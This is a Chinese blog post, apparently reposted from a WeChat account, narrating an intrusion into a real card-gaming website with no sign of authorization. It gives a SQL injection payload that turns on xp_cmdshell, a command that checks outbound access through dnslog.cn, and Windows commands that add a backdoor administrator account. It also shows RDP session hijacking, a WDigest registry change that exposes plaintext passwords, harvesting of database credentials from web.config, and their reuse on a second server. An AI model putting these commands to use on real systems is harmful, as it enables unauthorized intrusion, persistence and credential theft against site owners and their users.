某棋牌站点的简单渗透

前言：

前几天无意看到了某个师傅的博客，就看到了某棋牌站点的sql注入，于是花了几分钟打了一下，也就当第一次打这种站点，过程非常简单，最后也是获取到了数据库密码，网站后台密码。

sql注入：

该站点如果有师傅打过，肯定有感觉的。

登录框这里存在sql注入，sqlmap跑一下。

但是这里只是一个延时注入，是dba权限

这里就不执行os-shell了，太慢了，直接利用xp_cmdshell执行命令

xp_cmdshell上线：

开启xp_cmdshell:

admin';EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--

执行命令判断出网：

admin';exec master..xp_cmdshell 'ping dnslog.cn' --&password=123

就直接上线就行了：

这里如果用powershell一句话上线要注意转义，我最开始是执行下载木马命令然后在上线的，发现不能执行，因为权限比较低。

就是一个server权限，最后执行powershell语句上线的

内网渗透：

提权：

权限比较低，烂土豆一把梭

抓密码：

接着抓密码，显然是抓不到明文的，

这里简单讲一下常用的方法来获取管理员桌面：

RDP劫持：

这里我最开始想的是rdp劫持登录administrator的，发现管理员不在线

shell quser

如果管理员在线，利用sysytem执行：

tscon ID

然后接可以获取到管理员桌面了。

修改注册表：

这里我们可以修改注册表，然后进行锁屏，这样管理员在登陆的时候就可以抓到明文密码了：

##修改注册表：
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

锁屏主机：
rundll32.exe user32.dll,LockWorkStation

这里由于管理员不在线，所以就不演示了，可以本地复现一遍。

RDP hash传递：

这个方法我一直没有成功过，本地复现也失败，这里有兴趣的师傅可以自行了解一下。

克隆用户：

在这里的话我直接创建一个用户，然后克隆一个administrator账号：

shell net user xxxx 123!@#qw /add
shell net localgroup administrators xxxx /add

利用xxxx账户登陆进去克隆administrator账户

在重新登陆就能看到administrator桌面了

翻密码：

看到了mssql数据库正在运行：

开始寻找数据库账号密码，因为网站是asp的，所以直接找web.config文件：

dir C:,D: /b /s | find web.config""

收获挺大，翻到了两条数据库密码：

第一个是这个服务器的，第二个是另一个服务器的

这里就简单验证一下密码是否正确。

mssqlclient.exe "sa:password"@ip1
mssqlclient.exe "sa:password"@ip2

后台登录：

在本地数据库找到了网站账号和加密后的密码，丢到md5解密：

这尼玛，直接123456

登陆后台

靠，这个流量开个毛线呀。

原文始发于微信公众号（安全小子大杂烩）：某棋牌站点的简单渗透